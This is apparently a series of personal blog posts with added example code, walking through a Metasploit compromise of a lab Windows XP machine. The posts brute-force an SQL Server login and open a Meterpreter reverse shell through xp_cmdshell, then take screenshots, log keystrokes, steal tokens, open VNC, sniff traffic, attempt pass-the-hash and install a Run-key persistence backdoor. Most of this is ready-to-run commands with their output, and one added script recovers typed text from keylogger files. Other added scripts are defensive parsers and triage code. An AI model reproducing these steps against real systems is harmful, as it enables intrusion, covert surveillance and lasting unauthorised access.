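The ServerName/InstanceName/Version/tcp lines that mssql_ping prints, here and in the earlier mssql_ping post, are the decoded contents of a reply from the SQL Server Browser service on UDP port 1434 (the SSRP protocol). The Ruby below is an added example, not code from the blog or from Metasploit: it builds a reply in that format to match the page's output, decodes it into one hash per instance, and reports which TCP port each named instance listens on. The replies are constructed and nothing is sent on the network; the protocol framing (a 0x03 request byte, a 0x05 response byte followed by a 2-byte little-endian length and ';'-delimited key/value pairs ending in ';;') is as specified for SSRP.

```ruby
# Added example (not from the blog or Metasploit): decode the SQL Server
# Browser (SSRP, UDP/1434) reply behind mssql_ping's output. The client sends
# one byte 0x03 (CLNT_UCAST_EX); the server answers 0x05 (SVR_RESP), a 2-byte
# little-endian length, then ';'-separated key/value pairs, one instance per
# block, each block terminated by ';;'. Replies below are constructed.
CLNT_UCAST_EX = "\x03".b   # the request a client would send (not sent here)

def build_svr_resp(data)
  [0x05, data.bytesize].pack("Cv") + data.b
end

# Mirrors the single instance shown on the page.
SINGLE_INSTANCE_REPLY = build_svr_resp(
  "ServerName;LAB;InstanceName;SQLEXPRESS;IsClustered;No;Version;9.00.1399.06;tcp;1433;;"
)

# Two instances in one reply (a constructed case the page does not show).
TWO_INSTANCE_REPLY = build_svr_resp(
  "ServerName;LAB;InstanceName;SQLEXPRESS;IsClustered;No;Version;9.00.1399.06;tcp;1433;;" \
  "ServerName;LAB;InstanceName;TESTINST;IsClustered;No;Version;9.00.1399.06;tcp;49172;;"
)

# Returns an array of hashes, one per instance; raises on malformed input.
def parse_ssrp_reply(bytes)
  raise ArgumentError, "packet too short" if bytes.bytesize < 3
  type, length = bytes.unpack("Cv")
  raise ArgumentError, "not an SVR_RESP (0x05) packet" unless type == 0x05
  payload = bytes.byteslice(3, length)
  raise ArgumentError, "truncated payload" if payload.nil? || payload.bytesize < length
  payload.split(";;").reject(&:empty?).map do |block|
    fields = block.split(";")
    raise ArgumentError, "odd field count in #{block.inspect}" if fields.size.odd?
    fields.each_slice(2).to_h   # [key, value] pairs become a hash
  end
end

# The TCP port each named instance listens on, keyed by instance name.
def instance_tcp_ports(reply)
  parse_ssrp_reply(reply).each_with_object({}) do |inst, acc|
    acc[inst["InstanceName"]] = inst["tcp"].to_i if inst["tcp"]
  end
end

if __FILE__ == $PROGRAM_NAME
  parse_ssrp_reply(SINGLE_INSTANCE_REPLY).each { |inst| inst.each { |k, v| puts "#{k} = #{v}" } }
  p instance_tcp_ports(TWO_INSTANCE_REPLY)
end
```

The length field is checked against the bytes actually present before the payload is split, so a truncated or mislabelled datagram raises instead of producing a half-parsed instance; from a defender's side, the same decoder tells you which named instances a host is advertising to anyone who can reach UDP/1434.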

Lots of information here, now to brute force MS SQL with mssql_login:

msf > use scanner/mssql/mssql_login
msf auxiliary(mssql_login) > set PASS_FILE /usr/share/set/src/fasttrack/wordlist.txt
PASS_FILE => /usr/share/set/src/fasttrack/wordlist.txt
msf auxiliary(mssql_login) > set RHOSTS 192.168.1.79
RHOSTS => 192.168.1.79
msf auxiliary(mssql_login) > set THREADS 10
THREADS => 10
msf auxiliary(mssql_login) > exploit

[+] 192.168.1.79:1433 – MSSQL – successful login ‘sa’ : ‘password1′

MS SQL password and login successfully guessed.

Now to use mssql_payload, which exploits xp_cmdshell:

msf > use windows/mssql/mssql_payload
msf exploit(mssql_payload) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(mssql_payload) > set LHOST 192.168.1.70
LHOST => 192.168.1.70
msf exploit(mssql_payload) > set LPORT 443
LPORT => 443
msf exploit(mssql_payload) > set RHOST 192.168.1.79
RHOST => 192.168.1.79
msf exploit(mssql_payload) > set PASSWORD password1
PASSWORD => password1
msf exploit(mssql_payload) > exploit

[*] Started reverse handler on 192.168.1.70:443
[*] The server may have xp_cmdshell disabled, trying to enable it…
[*] Command Stager progress – 1.47% done (1499/102246 bytes)

[....]

[*] Sending stage (751104 bytes) to 192.168.1.79
[*] Command Stager progress – 100.00% done (102246/102246 bytes)
[*] Meterpreter session 1 opened (192.168.1.70:443 -> 192.168.1.79:1293) at 2013-06-13 10:39:46 +0100

meterpreter >

So I’m inside the target machine with the Meterpreter shell.

In my next post I will explore what to do next with Meterpreter.

Metasploit Meterpreter Shell: Screenshot, sysinfo, ps, migrate, keylog_recorder

This post follows on from a previous post in which the target machine was exploited and a Meterpreter shell obtained.

First, to export an image of the target machine’s desktop:

meterpreter > screenshot
Screenshot saved to: /root/hikMIGNN.jpeg

And here’s the result:

[Screenshot: hacked_desktop]

I must say seeing this was rather satisfying!

And now for system information:

meterpreter > sysinfo
Computer : LAB
OS : Windows XP (Build 2600, Service Pack 2).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32

Perfect.

Listing the processes:

meterpreter > ps

Process List
============

PID  PPID  Name  Arch  Session  User  Path
---  ----  ----  ----  -------  ----  ----
0 0 [System Process] 4294967295
4 0 System x86 0 NT AUTHORITY\SYSTEM
544 1032 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
572 1032 alg.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe
596 1032 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
668 1032 inetinfo.exe

[...]

1820  1772  explorer.exe              x86   0           LAB\Lab1                      C:\WINDOWS\Explorer.EXE

Now to “migrate” to explorer.exe:

meterpreter > migrate 1820
[*] Migrating from 3740 to 1820…
[*] Migration completed successfully.

Time for keystroke logging:

meterpreter > run post/windows/capture/keylog_recorder

[*] Executing module against LAB
[*] Starting the keystroke sniffer…
[*] Keystrokes being saved in to /root/.msf4/loot/20130613112010_default_192.168.1.79_host.windows.key_330924.txt
[*] Recording keystrokes…
^C[*] Saving last few keystrokes…
[*] Interrupt
[*] Stopping keystroke sniffer…

Whilst the keystroke logger was running, I typed a few things on the target machine, so in a new terminal let’s see if the keystrokes have been logged:

:~# cat /root/.msf4/loot/20130613112010_default_192.168.1.79_host.windows.key_330924.txt
Keystroke log started at 2013-06-13 11:20:10 +0100
OK this search on Google is
to determine if the Metas
ploit keyy <Back> logger is wo
rking <Back> <Return> <Return> Is any of
this being typed in Notepad
being recorded on the attacki <Back>
ng machine? <Return> <Return> Don’t know yet
, but will find out in a min! <Return> <Return>

Success, every keystroke on the target machine has indeed been recorded on the attacking machine.
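The loot file above is a raw keystroke stream with special keys written as tokens, which is awkward to read once corrections and line breaks pile up. The Ruby below is an added example, not code from the blog or from Metasploit: it rebuilds the text a user typed from a log in that format, applying each <Back> as a deletion and each <Return> as a line break. Assumptions made here: the first line is the "Keystroke log started at ..." header, wrapped lines join with no separator (the page shows "Metas"/"ploit" split across lines), and special keys appear as " <Back> ", " <Return> " or " <Tab> " with one padding space on each side. The log is constructed in that format.

```ruby
# Added example (not from the blog): reconstruct typed text from a
# keylog_recorder-style loot file. Assumed format: a header line, wrapped
# lines that join directly, and special keys written as " <Back> ",
# " <Return> " or " <Tab> " padded by one space on each side.
SAMPLE_KEYLOG = <<~'LOG'
  Keystroke log started at 2013-06-13 11:20:10 +0100
  Is the Metas
  ploit keyy <Back> logger wokr <Back>
  <Back> rking? <Return> Yes
LOG

# One special-key token (with its optional padding spaces) or one plain character.
KEY_TOKEN = / ?<(?:Back|Return|Tab)> ?|./m

# Returns the typed text as an array of lines (one per <Return>).
def reconstruct_keystrokes(log)
  lines = log.lines(chomp: true)
  lines.shift if lines.first.to_s.start_with?("Keystroke log started")
  stream = lines.join                       # assumption: wrapped lines join directly
  typed = [+""]
  stream.scan(KEY_TOKEN) do |tok|
    case tok.strip
    when "<Back>"   then typed.last.chop!   # delete the previous character
    when "<Return>" then typed << +""       # start a new line
    when "<Tab>"    then typed.last << "\t"
    else typed.last << tok                  # ordinary character, spaces included
    end
  end
  typed
end

if __FILE__ == $PROGRAM_NAME
  reconstruct_keystrokes(SAMPLE_KEYLOG).each { |line| puts line }
end
```

On the sample, "keyy <Back> logger" becomes "keylogger" and "wokr <Back><Back> rking?" becomes "working?", so the two recovered lines read "Is the Metasploit keylogger working?" and "Yes". A <Back> with nothing left to delete is a no-op, matching what the user would have seen on screen.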


Metasploit: Pass the Hash – windows/smb/psexec

Probably my favourite blog title so far.

Following on from the Hashdump post, in which I obtained the Windows passwords in the form of hashes and then decrypted them for the password, the following uses the hashes to log in without the need for decryption:

msf > use windows/smb/psexec
msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.1.70
LHOST => 192.168.1.70
msf exploit(psexec) > set LPORT 443
LPORT => 443
msf exploit(psexec) > set RHOST 192.168.1.79
RHOST => 192.168.1.79
msf exploit(psexec) > set SMBPass 120fafeb2e7c7e58944e2df489a880e4:e653e6452753c97e46792567dff599b6
SMBPass => 120fafeb2e7c7e58944e2df489a880e4:e653e6452753c97e46792567dff599b6
msf exploit(psexec) > exploit

[*] Started reverse handler on 192.168.1.70:443
[*] Connecting to the server…
[*] Authenticating to 192.168.1.79:445|WORKGROUP as user ”…
[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)

As you can see this completely failed, which did not take me by surprise since every time I have attempted to use the SMB command against this Windows system, it has failed.

No idea why.

Metasploit Meterpreter: Using ps and stealing Kerberos tokens

This follows on from a previous post within which a target machine was exploited and a Meterpreter shell obtained. Details of the exploited machine are:

Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

meterpreter > ps <-- lists the running processes

Process List
============

PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process] 4294967295
4 0 System x86 0 NT AUTHORITY\SYSTEM
192 1032 snmp.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\snmp.exe
468 1032 alg.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe
512 1032 vmnat.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\vmnat.exe
536 1032 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
580 1032 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
588 1032 vmnetdhcp.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\vmnetdhcp.exe
680 1032 vmware-authd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Player\vmware-authd.exe
696 1032 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
788 128 explorer.exe x86 0 LAB\Lab1 C:\WINDOWS\Explorer.EXE
860 536 wscntfy.exe x86 0 LAB\Lab1 C:\WINDOWS\system32\wscntfy.exe
892 4 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
964 892 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
988 892 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
1032 988 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
1044 988 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
1216 1032 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
1272 1032 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1436 988 logon.scr x86 0 LAB\Lab1 C:\WINDOWS\System32\logon.scr
1460 1032 sqlbrowser.exe x86 0 NT AUTHORITY\SYSTEM c:\Program Files\Microsoft SQL Server\90\Shared\sqlbrowser.exe
1508 1032 vmware-usbarbitrator.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Common Files\VMware\USB\vmware-usbarbitrator.exe
1652 1032 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1928 1032 inetinfo.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\inetsrv\inetinfo.exe
1968 1032 sqlservr.exe x86 0 NT AUTHORITY\SYSTEM c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe
2080 788 hqtray.exe x86 0 LAB\Lab1 C:\Program Files\VMware\VMware Player\hqtray.exe
2424 2396 ACpwO.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\TEMP\ACpwO.exe
3376 1032 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe

I've decided to steal the token from PID 1436, the logon.scr process running as LAB\Lab1 (1436 988 logon.scr x86 0 LAB\Lab1 C:\WINDOWS\System32\logon.scr):

meterpreter > steal_token 1436
Stolen token with username: LAB\Lab1

I believe I have now assumed the role of LAB1 and Meterpreter is running under the context of that user.
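
Read from the defender's side, the same listing is what an incident responder would work from: the payload that produced this shell is visible as ACpwO.exe, running as SYSTEM from C:\WINDOWS\TEMP with a parent PID that no longer exists. The Python below is an added example, not code from the post or from Metasploit; it parses a `ps` listing whose column padding has been collapsed as the blog rendered it, and scores each row on those two signals. The excerpt is taken from the listing above.

```python
import re

# Excerpt of the meterpreter `ps` listing quoted in the post, with the column
# padding collapsed to single spaces as the blog rendered it (constructed input).
PS_OUTPUT = r"""PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process] 4294967295
4 0 System x86 0 NT AUTHORITY\SYSTEM
536 1032 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
788 128 explorer.exe x86 0 LAB\Lab1 C:\WINDOWS\Explorer.EXE
1032 988 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
2080 788 hqtray.exe x86 0 LAB\Lab1 C:\Program Files\VMware\VMware Player\hqtray.exe
2424 2396 ACpwO.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\TEMP\ACpwO.exe
"""

# User and Path are the only columns that may contain spaces; Path always starts
# with a drive letter or a backslash, which is what lets the regex split the two.
ROW_RE = re.compile(
    r"^(?P<pid>\d+)\s+(?P<ppid>\d+)\s+(?P<name>\S+)\s+(?P<arch>x86|x64)\s+"
    r"(?P<session>\d+)\s+(?P<user>.+?)(?:\s+(?P<path>(?:[A-Za-z]:|\\)\S.*))?$"
)
TEMP_DIRS = ("\\windows\\temp\\", "\\appdata\\local\\temp\\")


def parse_ps(text):
    """Parse the rows of a `ps` listing into dicts; header and incomplete rows are skipped."""
    return [m.groupdict() for m in map(ROW_RE.match, text.splitlines()) if m]


def triage(text, threshold=2):
    """Score each process and return those at or above the threshold, highest first."""
    rows = parse_ps(text)
    live = {r["pid"] for r in rows}
    findings = []
    for r in rows:
        path = (r["path"] or "").lower()
        reasons = []
        if any(d in path for d in TEMP_DIRS):
            reasons.append((2, "image executes from a temp directory"))
        if r["ppid"] != "0" and r["ppid"] not in live:
            # weak on its own: explorer.exe is normally orphaned too, because
            # userinit.exe exits after starting the shell
            reasons.append((1, "parent PID %s is no longer running" % r["ppid"]))
        score = sum(w for w, _ in reasons)
        if score >= threshold:
            findings.append({"pid": r["pid"], "name": r["name"], "path": r["path"],
                             "score": score, "reasons": [msg for _, msg in reasons]})
    return sorted(findings, key=lambda f: -f["score"])


if __name__ == "__main__":
    for f in triage(PS_OUTPUT):
        print(f["pid"], f["name"], f["path"], "->", "; ".join(f["reasons"]))
```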

Metasploit Meterpreter: Run VNC

This follows on from a previous post within which a target machine was exploited and a Meterpreter shell obtained. Details of the exploited machine are:

Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

This is very cool. The following installs a VNC session on the exploited Windows system and gives me a graphical interface window of the target desktop to manipulate as if I were sitting at the machine.

meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=192.168.1.70 LPORT=4545)
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:\WINDOWS\TEMP\nMsMIPZFPZ.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.1.70:4545…
meterpreter > Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
No authentication needed
Authentication successful
Desktop name “lab”
VNC server default format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor. Pixel format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding

And up popped the target machine desktop:

[Screenshot: meterpreter_vnc]

Metasploit Meterpreter: Sniffing traffic on exploited system – Packetrecorder

This follows on from a previous post within which a target machine was exploited and a Meterpreter shell obtained. Details of the exploited machine are:

Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

meterpreter > run packetrecorder -i 1
[*] Starting Packet capture on interface 1
[+] Packet capture started
[*] Packets being saved in to /root/.msf4/logs/scripts/packetrecorder/LAB_20130625.5807/LAB_20130625.5807.cap
[*] Packet capture interval is 30 Seconds

^C <-- Ctrl+C stops the capture
[*] Interrupt
[+] Stopping Packet sniffer…
meterpreter >

The capture is saved under .msf4, a hidden folder in root's home directory on Kali.

Rather conveniently, everything logged by Packetrecorder is saved in pcap format, which opens straight in Wireshark:

[Screenshot: packetrecorder]

And 192.168.1.79 is the IP of the target machine.

Metasploit Meterpreter: Creating a persistent backdoor connection

This follows on from a previous post within which a target machine was exploited and a Meterpreter shell obtained. Details of the exploited machine are:

Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

The following Meterpreter persistence script keeps access to the exploited system even after a reboot. The script comes with a warning:

One word of warning here before we go any further. The persistent Meterpreter as shown here requires no authentication. This means that anyone that gains access to the port could access your back door! This is not a good thing if you are conducting a penetration test, as this could be a significant risk. In a real world situation, be sure to exercise the utmost caution and be sure to clean up after yourself when the engagement is done.

Here are the persistence script's options:

meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

-A Automatically start a matching multi/handler to connect to the agent
-L <opt> Location in target host where to write payload to, if none %TEMP% will be used.
-P <opt> Payload to use, default is windows/meterpreter/reverse_tcp.
-S Automatically start the agent on boot as a service (with SYSTEM privileges)
-T <opt> Alternate executable template to use
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i <opt> The interval in seconds between each connection attempt
-p <opt> The port on the remote host where Metasploit is listening
-r <opt> The IP of the system running Metasploit listening for the connect back

On to the Meterpreter script:

meterpreter > run persistence -X -i 50 -p 443 -r 192.168.1.79
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/LAB_20130625.2221/LAB_20130625.2221.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.79 LPORT=443
[*] Persistent agent script is 611063 bytes long
[+] Persistent Script written to C:\WINDOWS\TEMP\urMouyzhUqndV.vbs
[*] Executing script C:\WINDOWS\TEMP\urMouyzhUqndV.vbs
[+] Agent executed with PID 2520
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\TgZcTlqTJNmSbP
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\TgZcTlqTJNmSbP
meterpreter >

I have rebooted the target machine and will now test the connection from Metasploit.

msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > set LHOST 192.168.1.79
LHOST => 192.168.1.79
msf exploit(handler) > exploit

[-] Handler failed to bind to 192.168.1.79:443
[*] Started reverse handler on 0.0.0.0:443
[*] Starting the payload handler…

And it stuck there.

No idea why this didn’t work.
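
The persistence run above leaves two artefacts a defender can look for: a value with a generated name under HKLM\Software\Microsoft\Windows\CurrentVersion\Run, and a .vbs dropped in C:\WINDOWS\TEMP. The Python below is an added example, not code from the post or from Metasploit; it diffs two `reg query` snapshots of the Run key, a known-good baseline against the current state, and says why each new or changed value stands out. Both snapshots are constructed, and the new value's data is assumed to be the path of the dropped script.

```python
import re

# Constructed `reg query` snapshots of the HKLM Run key. BASELINE is what a clean
# build of the lab box shows; CURRENT adds the value the post's persistence run
# reported, assumed here to point at the .vbs it dropped in TEMP.
RUN_KEY = r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"
BASELINE = RUN_KEY + r"""
    VMware hqtray    REG_SZ    "C:\Program Files\VMware\VMware Player\hqtray.exe"
"""
CURRENT = BASELINE + r"""    TgZcTlqTJNmSbP    REG_SZ    C:\WINDOWS\TEMP\urMouyzhUqndV.vbs
"""

# A value line is indented and reads: name, REG_ type, data (data may have spaces).
VALUE_RE = re.compile(r"^\s+(?P<name>.+?)\s+(?P<type>REG_[A-Z_]+)\s+(?P<data>.*)$")
TEMP_DIRS = ("\\windows\\temp\\", "\\appdata\\local\\temp\\")
SCRIPT_EXT = (".vbs", ".js", ".wsf", ".bat", ".cmd", ".ps1", ".hta")


def parse_run_key(snapshot):
    """Map value name -> (type, data) from the `reg query` output of one key."""
    return {m["name"]: (m["type"], m["data"])
            for m in map(VALUE_RE.match, snapshot.splitlines()) if m}


def looks_generated(name):
    """Crude check for random names like TgZcTlqTJNmSbP: one long word of mixed case."""
    return name.isalnum() and len(name) >= 10 and not name.islower() and name != name.capitalize()


def diff_autoruns(baseline, current):
    """Return Run values that are new or changed since the baseline, with reasons."""
    before, after = parse_run_key(baseline), parse_run_key(current)
    findings = []
    for name, (vtype, data) in after.items():
        if before.get(name) == (vtype, data):
            continue                       # unchanged since the baseline
        reasons = ["changed since baseline" if name in before else "not in baseline"]
        low = data.lower()
        if any(d in low for d in TEMP_DIRS):
            reasons.append("launches from a temp directory")
        if any(ext in low for ext in SCRIPT_EXT) or "script.exe" in low:
            reasons.append("runs a script instead of an installed binary")
        if looks_generated(name):
            reasons.append("value name looks machine-generated")
        findings.append({"name": name, "data": data, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in diff_autoruns(BASELINE, CURRENT):
        print(f["name"], "->", f["data"], "|", "; ".join(f["reasons"]))
```

The same diff works against a snapshot of the HKCU Run key, which the script's -U option targets instead.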
